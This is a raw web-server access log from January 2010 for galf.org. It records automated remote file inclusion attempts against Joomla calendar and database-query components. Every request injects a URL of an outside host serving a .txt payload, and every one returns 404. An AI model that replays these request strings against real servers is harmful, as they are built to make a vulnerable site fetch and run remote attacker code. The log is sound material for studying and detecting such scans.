220.90.213.231 - - [04/Jan/2010:00:04:46 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:51 -0800] "GET /logs/access_091130.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:04:57 -0800] "GET /logs/access_091130.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:05:07 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.14.103.146 - - [04/Jan/2010:00:05:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.14.103.146 - - [04/Jan/2010:00:05:07 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.228.161.3 - - [04/Jan/2010:00:05:12 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:14 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:14 -0800] "GET /logs/access_090629.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:23 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:24 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:26 -0800] "GET /logs/access_091019.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:26 -0800] "GET /logs/access_091221.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:30 -0800] "GET /logs/access_091019.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:30 -0800] "GET /logs/access_091221.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:05:33 -0800] "GET /logs/access_090601.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:36 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:36 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:37 -0800] "GET /logs/access_090629.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:40 -0800] "GET /logs/access_090817.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:40 -0800] "GET /logs/access_090824.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:43 -0800] "GET /logs/access_090817.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:44 -0800] "GET /logs/access_090824.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:53 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:53 -0800] "GET /logs/access_091102.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:05:54 -0800] "GET /logs/access_091102.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:58 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:59 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:59 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:05:59 -0800] "GET /logs/access_090629.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:04 -0800] "GET /logs/access_091207.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:06 -0800] "GET /logs/access_091130.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.228.161.3 - - [04/Jan/2010:00:06:07 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
67.228.161.3 - - [04/Jan/2010:00:06:07 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
67.228.161.3 - - [04/Jan/2010:00:06:07 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:16 -0800] "GET /logs/access_090907.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:06:17 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:06:19 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:26 -0800] "GET /logs/access_091207.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:27 -0800] "GET /logs/access_091130.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:06:39 -0800] "GET /logs/access_090921.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:06:42 -0800] "GET /logs/access_090921.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:48 -0800] "GET /logs/access_091228.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:48 -0800] "GET /logs/access_091019.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:51 -0800] "GET /logs/access_091221.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:06:57 -0800] "GET /logs/access_090817.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:07:02 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:07:02 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:07:02 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:03 -0800] "GET /logs/access_091207.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:06 -0800] "GET /logs/access_091130.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:08 -0800] "GET /logs/access_091019.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:10 -0800] "GET /logs/access_091221.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:19 -0800] "GET /logs/access_090817.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:31 -0800] "GET /logs/access_090824.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:32 -0800] "GET /logs/access_091102.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:48 -0800] "GET /logs/access_091019.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:49 -0800] "GET /logs/access_090824.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:07:49 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:07:49 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:07:49 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:52 -0800] "GET /logs/access_091102.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:53 -0800] "GET /logs/access_091221.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:55 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:07:55 -0800] "GET /logs/access_090817.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:08:02 -0800] "GET /logs/access_090824.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:08:04 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:08:09 -0800] "GET /logs/access_090921.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:08:25 -0800] "GET /logs/access_090921.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:08:26 -0800] "GET /logs/access_091102.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:08:27 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.90.213.231 - - [04/Jan/2010:00:08:27 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.90.213.231 - - [04/Jan/2010:00:08:27 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.90.213.231 - - [04/Jan/2010:00:08:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.90.213.231 - - [04/Jan/2010:00:08:33 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.90.213.231 - - [04/Jan/2010:00:08:34 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.14.103.146 - - [04/Jan/2010:00:08:55 -0800] "GET /logs/access_090907.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:08:55 -0800] "GET /logs/access_090629.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:09:01 -0800] "GET /logs/scripts.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:09:05 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:09:05 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:09:05 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:09:14 -0800] "GET /logs/access_090601.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:09:20 -0800] "GET /logs/access_090601.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:09:36 -0800] "GET /logs/access_090921.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:10:15 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:10:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:10:15 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:10:21 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:10:21 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:10:21 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [04/Jan/2010:00:10:31 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:10:31 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [04/Jan/2010:00:10:31 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:11:06 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:11:07 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:11:07 -0800] "GET /logs/access.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:11:08 -0800] "GET /logs/access_090601.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:11:12 -0800] "GET /logs/access_090601.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
